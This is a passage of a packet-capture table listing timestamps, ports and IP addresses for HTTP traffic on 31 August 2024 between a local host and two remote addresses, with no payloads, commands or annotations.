Aug 31, 2024 15:44:18.142739058 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.142750025 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.142762899 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.142775059 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.142784119 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.142791033 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.142796040 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.142813921 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.142818928 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.142826080 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.142827034 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.142838955 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.142849922 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.142858028 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.142863035 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.142874002 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.142883062 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.142885923 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.142898083 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.142910004 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.142911911 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.142927885 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.142946005 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.143260956 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:18.143271923 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.143307924 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:18.143321037 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.143323898 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.143332958 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.143373966 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.143393040 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.143403053 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.143414974 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.143425941 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.143438101 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.143440962 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.143450022 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.143450022 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.143485069 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.143496037 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.143505096 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.143507957 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.143534899 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.143557072 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.143568993 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.143580914 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.143590927 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.143601894 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.143616915 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.143620968 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.143630981 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.143640041 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.143640995 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.143659115 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.143660069 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.143672943 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.143682957 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.143685102 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.143695116 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.143707037 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.143709898 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.143718004 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.143724918 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.143754005 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.144609928 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.144619942 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.144627094 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.144633055 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.144638062 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.144650936 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.144669056 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.144670010 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.144681931 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.144694090 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.144715071 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.144715071 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.144731045 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.144747972 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.144757986 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.144768953 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.144787073 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.144788027 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.144799948 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.144809961 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.144815922 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.144819975 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.144845009 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.144855022 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.232433081 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.232445002 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.232455969 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.232500076 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.232517004 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.232542992 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.232554913 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.232563972 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.232573986 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.232583046 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.232593060 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.232600927 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.232606888 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.232619047 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.232626915 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.232626915 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.232628107 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.232647896 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.232671976 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.232902050 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.232943058 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.232945919 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.232986927 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.233405113 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.233414888 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.233426094 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.233445883 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.233463049 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.233473063 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.233484030 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.233503103 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.233511925 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.233526945 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.233530998 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.233547926 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.233553886 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.233665943 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.233675957 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.233685970 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.233694077 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.233704090 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.233716965 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.233730078 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.233737946 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.233737946 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.233748913 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.233784914 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.233800888 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.233810902 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.233815908 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.233822107 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.233822107 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.233833075 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.233844995 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.233850002 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.233854055 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.233865976 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.233875990 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.233880997 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.233894110 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.233901978 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.233928919 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.234349966 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.234395981 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.234400034 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.234411955 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.234437943 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.234458923 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.234462023 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.234477997 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.234493971 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.234504938 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.234513998 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.234514952 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.234523058 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.234539032 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.234540939 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.234549046 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.234549999 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.234561920 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.234571934 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.234580040 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.234582901 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.234595060 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.234605074 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.234610081 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.234627008 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.234648943 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.235330105 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.235340118 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.235349894 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.235374928 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.235395908 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.235404968 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.235419035 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.235429049 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.235438108 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.235446930 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.235460043 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.235467911 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.235476971 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.235486984 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.235497952 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.235497952 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.235527992 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.235549927 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.235549927 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.235562086 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.235572100 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.235582113 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.235589981 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.235605955 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.235620022 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.236352921 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.236365080 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.236376047 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.236407995 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.236434937 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.236434937 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.236449003 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.236459970 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.236470938 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.236485958 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.236490965 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.236504078 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.236516953 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.236522913 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.236536026 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.236536980 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.236547947 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.236558914 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.236562967 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.236571074 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.236581087 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.236588955 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.236612082 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.236627102 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.237546921 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.237560987 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.237580061 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.237592936 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.237596035 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.237603903 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.237622976 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.237632990 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.237636089 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.237643957 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.237654924 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.237657070 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.237667084 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.237679005 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.237687111 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.237689972 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.237701893 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.237713099 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.237720013 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.237756014 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.237756014 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.237849951 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.237895966 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.237934113 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.238006115 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.238796949 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.238850117 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.238863945 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.238873005 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.238883972 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.238900900 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.238913059 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.238919973 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.238931894 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.238939047 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.238943100 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.238962889 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.238989115 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.238991976 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.239003897 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.239022970 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.239032984 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.239033937 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.239044905 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.239062071 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.239073038 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.239089012 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.239099026 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.239099026 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.239111900 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.239135027 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.239162922 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.239171982 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.239182949 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.239192009 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.239216089 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.239224911 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.239234924 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.239250898 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.239264965 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.239264965 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.239274979 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.239285946 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.239295959 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.239310026 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.239330053 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.329206944 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.329230070 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.329241037 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.329250097 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.329261065 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.329261065 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.329271078 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.329283953 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.329294920 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.329297066 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.329313040 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.329320908 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.329350948 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.329509974 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.329530001 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.329540014 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.329579115 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.329592943 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.329602957 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.329638958 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.329674959 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.329691887 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.329701900 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.329710007 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.329720020 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.329724073 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.329730034 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.329747915 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.329767942 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.329780102 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.329791069 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.329801083 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.329832077 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.329839945 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.329842091 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.329854012 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.329864979 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.329869986 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.329875946 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.329890966 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.329926014 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.329924107 CEST	80	49727	52.212.52.84	192.168.2.5
